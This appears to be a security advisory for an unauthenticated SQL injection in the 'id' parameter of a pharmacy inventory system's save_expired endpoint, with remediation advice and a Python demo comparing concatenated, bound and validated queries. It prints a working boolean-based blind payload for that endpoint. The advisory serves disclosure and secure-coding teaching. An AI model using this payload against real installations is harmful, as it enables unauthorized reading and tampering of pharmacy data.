# Vulnerability Summary: SQL Injection in Pharmacy Sales and Inventory System V1.0

## Vulnerability Overview

* **Affected Product**: Pharmacy Sales and Inventory System V1.0
* **Vulnerability Type**: SQL Injection
* **Vulnerable File**: `/ajax.php?action=save_expired`
* **Vulnerable Parameter**: POST parameter `id`
* **Root Cause**: The handler neither validates nor sanitizes the user-supplied `id` parameter and concatenates it directly into an SQL query, so attacker-controlled input is parsed as SQL rather than treated as a value.
* **Exploitation Conditions**: No authentication or authorization is required.

## Impact Scope

An attacker can exploit this vulnerability to read the database without authorization, leak sensitive data, tamper with records, and disrupt system operation, posing a severe threat to system security and business continuity.

## Remediation

1. **Use Prepared Statements and Parameter Binding**: Separate SQL code from user-supplied data so that the input is bound as a value and is never parsed as part of the query text.
2. **Input Validation and Filtering**: Strictly validate user input against the expected format; for `id`, accept only an integer and reject everything else before any query runs.
3. **Minimize Database User Privileges**: Give the database account used by the application only the privileges its tasks require, and do not use high-privilege accounts (such as root or admin) for day-to-day operations.
4. **Regular Security Audits**: Audit code and systems regularly to identify and remediate vulnerabilities promptly.

## POC Code

The injection point and payload reported for the `id` parameter. The technique is boolean-based blind: when the condition in the `CASE` is true the expression collapses to the integer `5`, and when it is false it yields a subquery returning two rows, so the server's response differs between the two cases and can be used as an oracle to extract data one condition at a time.

```
Parameter: id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (4784=4784) THEN 5 ELSE (SELECT 7970 UNION SELECT 3350) END))
```
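The script below is an added illustration, not code from the Pharmacy Sales and Inventory System, which is a PHP application; Python's `sqlite3` module stands in for its database layer. The table name `expired_stock`, its columns and the sample rows are constructed for the demo, and the `save_expired_*` functions are hypothetical handlers, not the product's own. It runs the advisory's payload against a query built by string concatenation, as the root cause describes, and then against a parameterized query with integer validation, so the difference between the first two remediation items is visible in the rows each variant affects.

```python
import sqlite3

# Payload quoted in the advisory, plus a variant with a false condition so the
# boolean oracle is visible. When the condition is true the CASE yields the
# integer 5; when false it yields a two-row subquery.
PAYLOAD_TRUE = "(SELECT (CASE WHEN (4784=4784) THEN 5 ELSE (SELECT 7970 UNION SELECT 3350) END))"
PAYLOAD_FALSE = "(SELECT (CASE WHEN (4784=4785) THEN 5 ELSE (SELECT 7970 UNION SELECT 3350) END))"


def fresh_db():
    """In-memory stand-in for an expired-stock table.

    Table name, columns and rows are constructed for this demo; they are not
    taken from the product's schema.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE expired_stock (id INTEGER PRIMARY KEY, status TEXT)")
    conn.executemany(
        "INSERT INTO expired_stock (id, status) VALUES (?, ?)",
        [(i, "pending") for i in range(1, 11)],
    )
    conn.commit()
    return conn


def save_expired_vulnerable(conn, user_id):
    """Mirrors the reported root cause: the POST `id` is concatenated into the SQL text."""
    sql = f"UPDATE expired_stock SET status = 'saved' WHERE id = {user_id}"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # rows the attacker-controlled SQL touched


def save_expired_bound(conn, user_id):
    """Parameter binding alone: the input is sent as a value and never parsed as SQL."""
    cur = conn.execute("UPDATE expired_stock SET status = 'saved' WHERE id = ?", (user_id,))
    conn.commit()
    return cur.rowcount


def save_expired_fixed(conn, user_id):
    """Validation plus binding: reject anything that is not an integer, then bind it.

    Returns None for rejected input (a real handler would answer HTTP 400).
    """
    try:
        record_id = int(str(user_id).strip())
    except ValueError:
        return None
    cur = conn.execute("UPDATE expired_stock SET status = 'saved' WHERE id = ?", (record_id,))
    conn.commit()
    return cur.rowcount


def demo():
    """Run each variant on a fresh table and report the rows affected."""
    return {
        # Injected SQL executes: the CASE evaluates to 5, so row 5 is updated.
        "vulnerable_true": save_expired_vulnerable(fresh_db(), PAYLOAD_TRUE),
        # The false branch yields an id that does not exist, so nothing is updated.
        # SQLite uses the first row of the multi-row subquery; MySQL instead raises
        # "Subquery returns more than 1 row". Either way the response differs from
        # the true case, which is what a blind attacker measures.
        "vulnerable_false": save_expired_vulnerable(fresh_db(), PAYLOAD_FALSE),
        # Bound as a literal string, the payload matches no integer id.
        "bound_payload": save_expired_bound(fresh_db(), PAYLOAD_TRUE),
        # Validation rejects the payload before any query runs.
        "fixed_payload": save_expired_fixed(fresh_db(), PAYLOAD_TRUE),
        # A legitimate request still works.
        "fixed_legit": save_expired_fixed(fresh_db(), "5"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

Binding on its own already neutralizes the payload, which is why item 1 of the remediation is the essential fix; the integer check in `save_expired_fixed` is the defence-in-depth layer from item 2 that also gives the caller a clean rejection path instead of a silent no-op.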